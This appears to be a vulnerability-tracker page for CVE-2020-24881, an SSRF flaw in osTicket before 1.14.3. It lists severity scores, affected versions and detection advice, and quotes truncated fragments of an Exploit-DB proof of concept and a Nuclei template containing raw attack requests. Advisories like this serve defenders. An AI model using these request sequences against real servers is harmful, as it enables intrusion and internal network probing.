CVE-2020-24881
published 2020-11-02CVE-2020-24881: SSRF exists in osTicket before 1.14.3, where an attacker can add malicious file to server or perform port scanning.
PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
73.27%
99.4th percentile
SSRF exists in osTicket before 1.14.3, where an attacker can add malicious file to server or perform port scanning.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| osticket | osticket | < 1.14.3 | 1.14.3 |
Detection & IOCsextracted from sources · hover to see the quote
url/open.php
url/ajax.php/form/help-topic/{{option_value}}
url/tickets.php?a=print&id={{ticketid}}
- →Detect SSRF exploitation attempt: monitor for POST requests to /open.php with multipart/form-data containing a crafted 'message' field, followed by a GET to /tickets.php?a=print — the print action triggers the server-side request to attacker-controlled URLs embedded in the ticket message.
- →Monitor for outbound DNS/HTTP requests from the osTicket server process triggered by the print ticket action — indicative of SSRF payload delivery via the ticket message body.
- →Alert on requests to /tickets.php with query parameter a=print, especially when the originating ticket was recently created via /open.php with an external URL in the message field.
- ·Vulnerability affects osTicket versions before 1.14.3 only; upgrade to 1.14.3+ to remediate. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
osTicket 1.14.2 - SSRF
exploitdb·2021-01-19·CVSS 9.8
CVE-2020-24881 [CRITICAL] osTicket 1.14.2 - SSRF
osTicket 1.14.2 - SSRF
---
# Exploit Title: osTicket 1.14.2 - SSRF
# Date: 18-01-2021
# Exploit Author: Talat Mehmood
# Vendor Homepage: https://osticket.com/
# Software Link: https://osticket.com/download/
# Version:
4. After submitting this comment, print this ticket.
5. You'll receive a hit on your malicious website from the internal server on which osTicket is deployed.
For more details, read my following blog:
https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0
https://nvd.nist.gov/vuln/detail/CVE-2020-24881
Nuclei
OsTicket < 1.14.3 - Server Side Request Forgery
nuclei·CVSS 9.8
CVE-2020-24881 [CRITICAL] OsTicket < 1.14.3 - Server Side Request Forgery
OsTicket '
internal: true
- raw:
- |
GET /open.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: option_value
part: body
group: 1
regex:
- 'Select a Help Topic.+?[ \n]+'
internal: true
- type: regex
name: csrf_token2
part: body
group: 1
regex:
- ''
internal: true
- raw:
- |
GET /ajax.php/form/help-topic/{{option_value}} HTTP/1.1
Host: {{Hostname}}
Referer: http://{{Hostname}}/open.php
- |
POST /open.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------266856663522356381601517168829
-----------------------------266856663522356381601517168829
Content-Disposition: form-data; name="__CSRFToken__"
{{csrf_token2}}
-----------------------------266856663522356381601517168829
Content-Disposition: form-data; name="a"
open
-----
No writeups or analysis indexed.
http://packetstormsecurity.com/files/160995/osTicket-1.14.2-Server-Side-Request-Forgery.htmlhttps://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0https://github.com/osTicket/osTicket/commit/d98c2d096aeb8876c6ab2f88317cd371d781f14dhttp://packetstormsecurity.com/files/160995/osTicket-1.14.2-Server-Side-Request-Forgery.htmlhttps://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0https://github.com/osTicket/osTicket/commit/d98c2d096aeb8876c6ab2f88317cd371d781f14d
2020-11-02
Published